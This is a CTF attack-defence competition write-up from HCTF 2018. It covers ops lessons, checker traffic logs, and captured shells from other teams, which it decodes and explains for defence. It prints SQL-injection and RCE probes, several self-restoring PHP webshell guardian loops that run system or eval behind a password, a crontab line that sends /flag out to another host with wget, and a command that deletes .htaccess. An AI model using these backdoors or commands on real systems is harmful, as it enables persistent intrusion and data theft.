HCTF 2018 AWD Notes


Reflection

We travelled all the way to Hangzhou and embarrassed the whole team...

A few lessons we paid for. This was our first AWD, and the organizers' format differed from what we had practised. Presumably because everyone who reaches the on-site final is a veteran, nobody catered to newcomers like us; there was not even a written rules sheet. Only well into the game did we learn that flags are settled every 10 minutes, and that a flag is void if the service it was taken from was marked down by the checker in that round: you can submit it within the 10 minutes and the platform reports "submitted successfully", but at settlement it scores nothing. A team whose service is down loses 60 points, and every team that stayed up gains 10. We were submitting piles of flags and feeling great, yet the points that actually landed were pitiful. On the first challenge, apart from Tianshu (天枢) and Blue-Lotus (蓝莲花), whose services were occasionally healthy for a round and earned 100-plus points, every team was down the whole time. Defence matters exactly as much as attack.

Next, the checker. We wasted a lot of time on the network and SSH setup (we could not tell 1 from l and 0 from O in the credentials), so by the time we were online our box had already been seeded with a pile of shells. We never had the pristine source, and even rolling back to the first backup left many pages broken; web1 ended up marked down by the checker for two full days. As for patching: don't imagine that chmod 555 on the whole site will stop uploaded shells. This time the upload point was itself a check point, which I go through below together with the checker traffic.

On operations: I handled ops for our team. The really annoying part was that our upload hole was never actually patched, because I kept "defending" it with 555. Whenever we wanted to change something we had to add write permission back, and a pile of resident shells landed immediately. I asked the other teams afterwards: their undying shells derive a random file name and password from a hash of the target IP, one has a guardian process, and one keeps copying itself. On web1 ops were manageable, but on web2 just working out the routing took ages (it was .htaccess nested inside .htaccess), so an ops shell I uploaded into my own directory could not be reached at all. And since Caidao (菜刀) could not connect, I was typing commands one at a time through Burp:

  1. As the team user: chmod 777 -R ./upload, so the directory is writable and the files inside it can be deleted
  2. As www-data: killall -u www-data, to kill the undying shells' processes
  3. As www-data: chmod 777 -R ./upload, to change the permissions on the shells themselves
  4. Only then does rm -rf actually remove them
    But because we had not patched the hole, the moment we granted write permission as the team user another pile of shells flew in...
    We lost a lot of time here, so prepare a Python Caidao client in advance with these steps already scripted.

Forget Caidao for this event. With exams coming up, our webshell client still had unfixed bugs, so we had to write exploit scripts for each vulnerability type on the spot, and they did nothing more than drop a shell and read the flag. None of the other tricks got any use.

Checker traffic analysis

Afterwards I exported the traffic our WAF had recorded and went through it. The organizers' checker was strict indeed: on day one every web service in the room was down. It also checks whether you are running a generic WAF (通防).

From the traffic, web1's check flow is:
register -> login -> upload an image -> include the image
The pile of messy, payload-looking strings in the data is clearly how the organizers test for a generic WAF.

So:

  1. Never use 555; a .htaccess is the lesser evil (even though the Blue-Lotus folks later rm'd/overwrote ours anyway)
  2. Don't bother banning IPs: the checkbot's IP changes several times, you can be reported on top of that, and getting caught once costs 800 points...
  3. After cutting an attack surface, don't just delete the feature. The file-include point looked like nothing but a backdoor, '<?php include($_GET['img']); ?>', and who would have guessed it was a check point...
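What an upload-directory .htaccess for this situation looks like, as an added example (not from the original post and not the file we used on the day): it stops PHP from running under the directory while leaving the directory writable, so the checker's upload still succeeds. The module names and the Apache 2.4 Require syntax are assumptions about the target stack.

```apache
# Added example: <upload dir>/.htaccess.  Needs AllowOverride All (or at least
# Options and AuthConfig) in the vhost, otherwise it is silently ignored.

# mod_php only: never execute PHP from this directory.  The module is mod_php5.c
# on PHP 5 and mod_php.c on PHP 8; under php-fpm the directive does not exist,
# and an unguarded php_flag would turn every request into a 500.
<IfModule mod_php7.c>
    php_flag engine off
</IfModule>

# any SAPI: refuse to serve anything with a PHP-looking extension directly
# (Apache 2.2 needs "Order deny,allow" / "Deny from all" instead of Require)
<FilesMatch "\.(php|phtml|phar|php[3-7])$">
    Require all denied
</FilesMatch>
```

It does nothing for the include point (index.php?img=...), which reads the uploaded file through include() regardless of how the upload directory is served; that one needs its path restricted to the skin directory and real image files, not removed. And as the Compiler.php request below shows, a .htaccess is only as safe as the rest of the box: anyone with code execution elsewhere simply deletes it.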
time: 
ip: 192.168.233.42
POST /client/user/emmm_play.class.php?emmm_cms=reg&flag=ZrMlDhzjtpiKdWQnPNVyBxvw%20'%20or%20select%201,2,3,4,5,(select%200xazuLSJeROvTlnChqgXmBpFckHADoKfGsbdZMPItVwirjENWQUyxY),7,8,9,10,11,12
Host: 192.168.233.40:5005
Content-Length: 274
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
post-data: lang=cn&COL_Useremail=wqtCeoznUp%40pDusboSjcE.com&COL_Useranswer=KvcuIkTRwz&COL_Userproblem=%E4%BD%A0%E8%87%AA%E5%B7%B2%E7%9A%84%E7%94%9F%E6%97%A5%EF%BC%9F&source=0&ip=127.0.0.1&COL_Userpass2=123456&COL_Userpass=123456&introducer=&Submit=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C


time:
ip: 192.168.233.42
POST /client/user/emmm_play.class.php?emmm_cms=login&flag=edruHEyhIcsMPivmpoWxlzNjVYCFgLwSaAGDbnkt%20'%20&&%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,(select%200xeYKCTRrMpmofFqEsdNhnZlcXDiUVSbxgzHyGuQJtIBWjvLPwkaOA)
Host: 192.168.233.40:5005
Content-Length: 87
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Cookie: PHPSESSID=ol9nsqdpgkli34mu4kuebohcqk
Content-Type: application/x-www-form-urlencoded
post-data: COL_Useremail=wqtCeoznUp%40pDusboSjcE.com&COL_Userpass=123456&Submit=%E7%99%BB%E5%BD%95


time:
ip: 192.168.233.42
POST //client/user/emmm_play.class.php?emmm_cms=edit&lang=cn
Host: 192.168.233.40:5005
Content-Length: 79075
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0
Connection: keep-alive
Cookie: PHPSESSID=ol9nsqdpgkli34mu4kuebohcqk
Content-Type: multipart/form-data; boundary=ad7bceb5053a4b3ca22cd26f34b77a19


time:
ip: 192.168.233.42
GET /client/user/index.php?img=../../skin/HcSLetgnrb.png
Host: 192.168.233.40:5005
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.7.0 CPython/2.7.15 Darwin/18.2.0

day2-web1:

2018/12/16 02:32:10
GET /check?cmd=sdhABbfUTgCuIWqSnvXRjYLM.move_file(AOFyfsqBgVeoTdKtMSICEjaGbRUHL.base64_decode(file_get_content(VMZthpbqiuzURmGCDEwFHyadSPrNeWxnQsYkKXcgJAjoTlBIOvfL).zGgOeoBqwVrIjayQLUWbDinvh).SFhuxlvKbWkUwMYE HTTP/1.1
IP:192.168.22.243
HOST:192.168.117.100:9009:9009
USER_AGENT:
COOKIE:
REFERER:




2018/12/16 02:37:02
GET /check?cmd=MxyLYmfRiUWuqIFCVowJrOSATEgtHs ' && select 1,2,3,4 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:
REFERER:


2018/12/16 02:37:02
GET /?cmd=YfLvGKAnQNebwqpPijUu ' or select 1,2,3,4,5,6,7,8,9,10,11,12,(select 0xyUpKDhLVwfBtFivxAbZqEjXCQdJYMaGlozIHPnuekOcNmsgWR),14,15,16,17,18,19,20,21,22,23,24,25 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:
REFERER:


2018/12/16 02:37:02
GET /users/register?cmd=irTekycoKIWSRCsfUqxBAgapl.substr(NhaVIUPfvOmuAjDgrsXJSKMixYyBZo.readdir(VnAGsifbEUZzjCw.move_file(DivqLWumQORGaTkJrC.readdir(base64_decode(fporTBYmQdAHxyuRXcIEnDFhGOkzMbLaWwNVetUvqjZPgClJKSsi).LEwjPvQxCKFOA).TEivOpdPRkrcouhzVKbeIaFUGH).OMVWBXdxNPGgAeLhS).pdrcXqohZFHW) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/register?cmd=xRVrcDLSZMUPpbXjsBiOz ' union select 1,2,3,4,5,6,7,(select 0xXctOkvxodFyfGUuTDgblraRziAVSYKsQJHemEjZhwPWnLICNBMqp),9,10,11,12,13,14,15 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=ecCNkO&confirm_password=kaljXLRHtU&password=kaljXLRHtU


2018/12/16 02:37:02
GET /users/login HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


2018/12/16 02:37:02
GET /users/login?cmd=bcjusDLfkrpMTwHeloSWZgqAd.file_put_contents(fhHiInvDELpKeJ.readdir(NFvnqgXMJHDE.glob(mtCEkDWycgzqnQVLaJPiZS.assert(ytvJChwoYe.fread(file_put_contents(GwLUrvORJmIPfYjVcMAuCtzBSThHZqXKb).hnrjIwBUuPexykfiWqc).HBSQthcujMYWDFPUkaAVgbivTsnN).KYsLfDbFHW).HGTMvLBkRgDmVKIso).RbIkdCSDoErKHYFqatGNjsWh) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/login?cmd=GLpMuASfsPFWiXc.fread(CBMwgWxDbtcFPjAmNnXUVovKpieaLY.fread(mzuYHcTVvraCJhXR.dirname(lwzeLcmxMbTUoXgsABfYiJ.system(zHaZomhUABCrlWPykdqbIiD.eval(system(CxrWZSDBOknpjNweauXYdAgvoPzHQJRsbGcfVtElFMyIKThUqimL).jBqTLeChVQsDxmRtIZWbgki).yMqBZgcwzXjblrAYfEUICQThnD).GkovubFLynSrixIcpJgqR).OSyBnrvoWeXuIPNpEGsARZzJ).hsjweqlXxPrDROkMEibS) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=ecCNkO&password=kaljXLRHtU


2018/12/16 02:37:02
GET /users HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/editprofit?cmd=YzOLfeHKbVjZyhcwonRXtJvTpSEIu.glob(maOUqAfuQhYM.file_get_content(KrzfMtSDuExbLX.move_file(readdir(gKUYOAHyNewQkRnoJfMXBmzpjTiaGdshcCEtFbrqxVWDIvSuPLlZ).TuPQJlhNjUYARoKIDEtCsaWcLBx).vikIXSEDftUW).fPzAivYRQEcIKCXrnNs) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=QwLryC&email=vESrMpul%40OlZDs


2018/12/16 02:37:02
GET /users HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:


POST /users/editAvatar?cmd=XJqDYlazVZAxwtmNFnIyiQkGSvPcKOHoRfEWT ' and select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select 0xCUJzbVPHQLMpGZxaBDRSFdfhgcWEkryqiswlvjnTutmIAYKNXeoO),30,31,32,33,34,35 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:


POST /users?cmd=OYhzfowNAdGcvpRWsUbCXqIn.dirname(ZxtIKuPJprHCifgvGLQDmTeWjEnRsd.assert(qAxgrvhSiK.move_file(UTpIhfOkulKaxSoQjzwLmHZeYtr.substr(JimRENYeHZ.dirname(assert(fldrzeIkncKqORGVTiEtuFhoNwpJAPxSyUBDCLmZvXHWQMagsjYb).mzLflHhTvrCGyjPSnNU).PuvwmptyQRWn).UcrCmvYgKjAFiXEVuIeGw).wBJClAQUGr).puUhczOWfMJQSxIyqXLEGAwnNCKDRZ) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
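Reconstructing the check flow from this log, as an added example (not from the original post): a parser for the day-2 WAF format above plus a grouping step that lists, per source, the routes hit and in what order, which is the functional flow you must keep working while patching. SAMPLE_LOG is a constructed excerpt in the same format, shortened from the entries above; its last record is reassembled from the Compiler.php request shown later with moxiaoxi's IP and a browser User-Agent as stand-ins. The (IP, User-Agent) grouping key and the burst threshold are choices of this example, not documented checker behaviour.

```python
"""Added example, not from the original post: parse the day-2 WAF log format and
reconstruct each source's request sequence (the checker's functional flow).
SAMPLE_LOG is a constructed, shortened excerpt in the same format; the last
record is reassembled from the Compiler.php request with moxiaoxi's IP and a
browser User-Agent as stand-ins.  Grouping key and burst threshold are
choices of this example."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_LOG = """\
2018/12/16 02:37:02
POST /users/register?cmd=xRVrcDLSZMUPpbXjsBiOz ' union select 1,2,(select 0xXctOkvxodFyf),4 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=ecCNkO&confirm_password=kaljXLRHtU&password=kaljXLRHtU

POST /users/login?cmd=GLpMuASfsPFWiXc.fread(CBMwgWxDbtcF.system(zHaZomh.eval(Cxr))) HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:username=ecCNkO&password=kaljXLRHtU

2018/12/16 02:37:02
POST /users/editAvatar?cmd=XJqDYlazVZ ' and select 1,2,3 HTTP/1.1
IP:192.168.50.150
HOST:192.168.117.100:9009:9009
USER_AGENT:python-requests/2.18.4
COOKIE:PHPSESSID=
REFERER:
POST:

2018/12/16 02:40:11
GET //libraries/lithium/template/view/Compiler.php?along=system('/bin/echo mo123;rm /home/team/workdir/app/webroot/uploads/.htaccess;/bin/echo xiaoxi456890'); HTTP/1.1
IP:192.168.13.134
HOST:192.168.117.100:9009:9009
USER_AGENT:Mozilla/5.0
COOKIE:
REFERER:
"""

TS_RE = re.compile(r"^\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}$")
REQ_RE = re.compile(r"^(GET|POST) (.+) HTTP/\d\.\d$")

def parse_log(text):
    """One dict per request. A record with no timestamp line of its own inherits the
    previous one (assumption: the WAF prints the time once per second)."""
    records, last_ts = [], None
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {"time": None, "method": None, "path": None, "query": ""}
        for line in chunk.splitlines():
            if TS_RE.match(line):
                last_ts = line
            elif m := REQ_RE.match(line):
                url = urlsplit("/" + m.group(2).lstrip("/"))  # '//x' would parse as a host
                rec["method"], rec["query"] = m.group(1), url.query
                rec["path"] = re.sub(r"/+", "/", url.path)
            elif ":" in line:
                key, _, val = line.partition(":")  # 'HOST:a:b' keeps the whole value
                rec[key.lower()] = val
        if rec["path"]:
            rec["time"] = last_ts
            records.append(rec)
    return records

def flows(records):
    """Requests grouped by (source IP, User-Agent) in arrival order."""
    out = defaultdict(list)
    for r in records:
        out[(r.get("ip", ""), r.get("user_agent", ""))].append(r)
    return dict(out)

def route_sequence(reqs):
    """Distinct routes in first-seen order: the functional flow this source walks."""
    seq = []
    for r in reqs:
        if r["path"] not in seq:
            seq.append(r["path"])
    return seq

def checker_like(reqs, burst_routes=3):
    """Heuristic: a scripted User-Agent hitting several distinct routes within one
    second. Exploit scripts usually hit one or two; confirm by eye before acting."""
    ua = reqs[0].get("user_agent", "").lower()
    per_second = defaultdict(set)
    for r in reqs:
        if r["time"]:
            per_second[r["time"]].add(r["path"])
    burst = any(len(paths) >= burst_routes for paths in per_second.values())
    return (ua == "" or ua.startswith("python-requests")) and burst

if __name__ == "__main__":
    for src, reqs in flows(parse_log(SAMPLE_LOG)).items():
        tag = "checker?" if checker_like(reqs) else "other"
        print(src, tag, " -> ".join(route_sequence(reqs)))
```

The post notes that the checkbot's IP changes; when it does, the (IP, User-Agent) key splits one checker into several sources, so merge on the PHPSESSID cookie or the registered username where the log has them. The cmd= values on the checker's requests are the generic-WAF bait: look at them to learn what not to block, not to build signatures from.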

Communication

Internet access was not restricted, but switching between the wired network and Wi-Fi was a hassle and latency was a problem. Within the team we used the LAN chat program IPMsg (飞鸽传书). We also tried two network cards, but that still had a few small issues.

The other teams' shells

  • moxiaoxi's shell:
    moxiaoxi ip: 192.168.13.134

His shell also verifies the file's content: the guardian loop below rewrites the shell whenever the file differs from the expected bytes. It can still be hijacked. While cleaning shells, note the file name; once the loop is dead, drop a same-named file of your own that logs incoming requests, and you have his password, so you can ride along on his traffic~

The command that went through the RCE:
system('/bin/echo mo123;/bin/echo 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 | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');


The two echo markers (mo123 / xiaoxi456890) bracket the command output so the client can cut it out of the page; the base64 between them decodes to a small PHP dropper:
$path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
$code_template = "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";
file_put_contents($path, base64_decode($code_template), LOCK_EX);


$code_template decodes to the guardian loop:

<?php
ignore_user_abort(true);   // keep running after the client disconnects
set_time_limit(0);         // no execution-time limit
$file = ".4b22331ce86c8caa0adc37039326d5fc.php";
$shell = base64_decode('PD9waHAKaWYoQCRfUkVRVUVTVFsiaGFzaCJdPT09ImZlYWQwZmZhMDBjMTliNmI2ZTI1ZTYwZmIzYmNlYjRiIikKewogICAgQHN5c3RlbSgkX1JFUVVFU1RbIm1veGlhb3hpNjY2Il0pOwp9Cj8+');
unlink(__FILE__);          // the dropper deletes itself; only the running process remains
while (TRUE) {{            // the doubled braces are nested blocks, still valid PHP
if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}   // the content check: restore within microseconds of any change
usleep(5);
}}
?>

and $shell decodes to the backdoor itself, a fixed "hash" value gating system() on the moxiaoxi666 parameter:

<?php
if(@$_REQUEST["hash"]==="fead0ffa00c19b6b6e25e60fb3bceb4b")
{
@system($_REQUEST["moxiaoxi666"]);
}
?>
  • 2: the same dropper as it appeared in the log (URL-encoded), then decoded layer by layer:

    system%28%27%2Fbin%2Fecho+mo123%3B%2Fbin%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%3D%3D+%7C+%2Fusr%2Fbin%2Fbase64+-d+%7C+%2Fbin%2Fcat+%3E+%2Fhome%2Fteam%2Fworkdir%2F%2F.4b22331ce86c8caa0adc37039326d5fc.php%3B%2Fbin%2Fecho+xiaoxi456890%27%29%3B

    // url decode
    system('/bin/echo mo123;/bin/echo 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 | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');

    // base64 decode
    system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
    $code_template = "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";
    file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');

    // base64 decode
    system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
    $code_template = "<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
    $shell = base64_decode('PD9waHAKaWYoQCRfUkVRVUVTVFsiaGFzaCJdPT09ImZlYWQwZmZhMDBjMTliNmI2ZTI1ZTYwZmIzYmNlYjRiIikKewogICAgQHN5c3RlbSgkX1JFUVVFU1RbIm1veGlhb3hpNjY2Il0pOwp9Cj8+');
    unlink(__FILE__);
    while (TRUE) {{
    if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
    usleep(5);
    }}
    ?>";
    file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');


    // decode
    system('/bin/echo mo123;/bin/echo $path = '/home/team/workdir/skin/.4b22331ce86c8caa0adc37039326d5fc.php';
    $code_template = "<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = ".4b22331ce86c8caa0adc37039326d5fc.php";
    $shell = base64_decode('<?php
    if(@$_REQUEST["hash"]==="fead0ffa00c19b6b6e25e60fb3bceb4b")
    {
    @system($_REQUEST["moxiaoxi666"]);
    }Cj8+');
    unlink(__FILE__);
    while (TRUE) {{
    if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
    usleep(5);
    }}
    ?>";
    file_put_contents($path, base64_decode($code_template), LOCK_EX)Ow== | /usr/bin/base64 -d | /bin/cat > /home/team/workdir//.4b22331ce86c8caa0adc37039326d5fc.php;/bin/echo xiaoxi456890');
  • 3: a crontab backdoor that makes the victim submit its own flag every minute

    system('/bin/echo mo123;/bin/echo KiAqICogKiAqIC91c3IvYmluL3dnZXQgImh0dHA6Ly8xOTIuMTY4LjIwMC4xNTA6ODAwNS9hcGkvdGVhbS9zdWJtaXQvL2MxMzYyODI2MjI5M2M1ODVlYmZhZDM3Y2ExYzVlNzdkNDI4ZjVkY2QiIC1kICImZmxhZz0kKC9iaW4vY2F0IC9mbGFnKSIgLUggIkNvb2tpZTpkZGFhcyIK | /usr/bin/base64 -d | /bin/cat >> /tmp//tmp.conf ; /usr/bin/crontab /tmp//tmp.conf;/bin/echo xiaoxi456890');


    base64-decoded: one cron line (installed with "crontab FILE", which replaces the web user's whole crontab)
    * * * * * /usr/bin/wget "http://192.168.200.150:8005/api/team/submit//c13628262293c585ebfad37ca1c5e77d428f5dcd" -d "&flag=$(/bin/cat /flag)" -H "Cookie:ddaas"

    The box reads /flag every minute and submits it with the attacker's token, so the attacker keeps scoring after the webshell is gone; check crontab -l for every user when cleaning, not just the upload directory. The line uses curl's option names, though: for wget, -d is --debug and -H is --span-hosts (wget would need --post-data and --header), so as captured the flag never actually makes it into the request.
  • 4: another team's guardian shell, same structure with a different obfuscation

    system%28%27%2Fbin%2Fecho+HENCE666%3B%2Fbin%2Fecho+PD9waHAKCQlpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKCQlzZXRfdGltZV9saW1pdCgwKTsKCQkkZmlsZSA9ICItLThmMDI5MzhlOWQyMWU2N2JmYzg3MjQwZjU4NGQ2NDQzLnBocCI7CgkJJHNoZWxsID0gJzw%2FcGhwIGlmKCRfUkVRVUVTVFtoYXNoXT09ImY5YjY5YTA5NjUxNGYyODIxMjg5MzVmZDA3N2YyZWJiIil7JGNfMSA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFthXSkpOyRjXzIgPSBiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1JFUVVFU1RbYl0pKTskY18xKCRjXzIpO30%2FPic7CgkJdW5saW5rKF9fRklMRV9fKTsKCQl3aGlsZSAoVFJVRSkge3sKCQlpZiAoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpIT09JHNoZWxsKSB7eyBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwgJHNoZWxsKTsgfX0KCQl1c2xlZXAoNSk7CgkJfX0KCQk%2FPg%3D%3D+%7C+%2Fusr%2Fbin%2Fbase64+-d+%7C+%2Fbin%2Fcat+%3E+%2Fvar%2Fwww%2Fhtml%2F%2F--8f02938e9d21e67bfc87240f584d6443.php%3B%2Fbin%2Fecho+ZHANG777%27%29%3B

    // URL-decoded
    system('/bin/echo HENCE666;/bin/echo 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 | /usr/bin/base64 -d | /bin/cat > /var/www/html//--8f02938e9d21e67bfc87240f584d6443.php;/bin/echo ZHANG777');

    // base64-decoded: the file written to /var/www/html. The leading "--" in the name makes a
    // bare "rm --8f02...php" fail as an unknown option; use "rm -- <name>" or "./<name>".
    system('/bin/echo HENCE666;/bin/echo <?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = "--8f02938e9d21e67bfc87240f584d6443.php";
    // the backdoor: function name (a) and argument (b) arrive base64-encoded then rot13'd and are
    // called as $c_1($c_2), so no eval/system keyword ever appears in the request
    $shell = '<?php if($_REQUEST[hash]=="f9b69a096514f282128935fd077f2ebb"){$c_1 = base64_decode(str_rot13($_REQUEST[a]));$c_2 = base64_decode(str_rot13($_REQUEST[b]));$c_1($c_2);}?>';
    unlink(__FILE__);
    while (TRUE) {{
    if (file_get_contents($file)!==$shell) {{ file_put_contents($file, $shell); }}
    usleep(5);
    }}
    ?> | /usr/bin/base64 -d | /bin/cat > /var/www/html//--8f02938e9d21e67bfc87240f584d6443.php;/bin/echo ZHANG777');
  • 5: a loop that rewrites its shell and chmods it 500

%24path+%3D+%27%2Fhome%2Fteam%2Fworkdir%2Fskin%2F--ssssss.php%27%3B%24data+%3D+%27PD9waHAKICAgIGlnbm9yZV91c2VyX2Fib3J0KHRydWUpOwogICAgc2V0X3RpbWVfbGltaXQoMCk7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgJHBhdGggPSAiL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLnNzc3Nzcy5waHAiOwogICAgICAgICRkYXRhID0gIjw%2FcGhwIGlmKG1kNShcJF9QT1NUWydwYXNzJ10pPT0nYzI3MjFkODM2ZGRiNjg2YjBiMDFjYjAwNjYwODk5NTAnKUBldmFsKFwkX1BPU1RbJ2NtZCddKTs%2FPiI7CiAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCAkZGF0YSk7CiAgICAgICAgc3lzdGVtKCdjaG1vZCA1MDAgJy4kcGF0aCk7CiAgICAgICAgdXNsZWVwKDEwMCk7CiAgICB9CiAgICA%2FPg%3D%3D%27%3B%24data%3D+base64_decode%28%24data%29%3B%40file_put_contents%28%24path%2C%24data%29%3Bsystem%28%27chmod+500+%27.%24path%29%3Bsystem%28%27%27rm+%29

    // URL-decoded (the trailing system(''rm ) is truncated in the log as captured)
$path = '/home/team/workdir/skin/--ssssss.php';$data = 'PD9waHAKICAgIGlnbm9yZV91c2VyX2Fib3J0KHRydWUpOwogICAgc2V0X3RpbWVfbGltaXQoMCk7CiAgICB3aGlsZSAoMSl7CiAgICAgICAgJHBhdGggPSAiL2hvbWUvdGVhbS93b3JrZGlyL3NraW4vLnNzc3Nzcy5waHAiOwogICAgICAgICRkYXRhID0gIjw/cGhwIGlmKG1kNShcJF9QT1NUWydwYXNzJ10pPT0nYzI3MjFkODM2ZGRiNjg2YjBiMDFjYjAwNjYwODk5NTAnKUBldmFsKFwkX1BPU1RbJ2NtZCddKTs/PiI7CiAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCAkZGF0YSk7CiAgICAgICAgc3lzdGVtKCdjaG1vZCA1MDAgJy4kcGF0aCk7CiAgICAgICAgdXNsZWVwKDEwMCk7CiAgICB9CiAgICA/Pg==';$data= base64_decode($data);@file_put_contents($path,$data);system('chmod 500 '.$path);system(''rm )

    // base64-decoded: the guardian loop. Note the two names: the loop file is --ssssss.php,
    // the shell it keeps alive is .ssssss.php, both in the skin directory
    $path = '/home/team/workdir/skin/--ssssss.php';$data = '<?php
    ignore_user_abort(true);
    set_time_limit(0);
    while (1){
    $path = "/home/team/workdir/skin/.ssssss.php";
    // the shell: md5 of the POST "pass" field must match, then eval of the POST "cmd" field
    $data = "<?php if(md5(\$_POST['pass'])=='c2721d836ddb686b0b01cb0066089950')@eval(\$_POST['cmd']);?>";
    @file_put_contents($path, $data);
    // mode 500: read-only even for the owner, so overwriting it fails until it is chmod'ed back;
    // deleting it only needs write permission on the directory, which is why the cleanup steps
    // above chmod before they rm
    system('chmod 500 '.$path);
    usleep(100);
    }
    ?>';$data= base64_decode($data);@file_put_contents($path,$data);system('chmod 500 '.$path);system(''rm )
  • Deleting / overwriting the upload directory's .htaccess (code execution through the along parameter of Compiler.php):

    GET //libraries/lithium/template/view/Compiler.php?along=system('/bin/echo mo123;rm /home/team/workdir/app/webroot/uploads/.htaccess;/bin/echo xiaoxi456890');

    So a .htaccess in the upload directory holds only as long as nobody has code execution elsewhere on the box; it has to go together with patching the RCE.
  • One I did not recognise at the time:
    ip: 192.168.17.11

    %40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22d32d8%22%3B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3Becho%20%221d77b%22%3Bdie()%3B

    // URL-decoded. This is the first-connection probe of a Caidao (China Chopper) style client:
    // two random markers bracket the reply, and between them come the script's directory, the
    // drive letters on Windows or "/" on Unix, php_uname() and the effective user, tab-separated
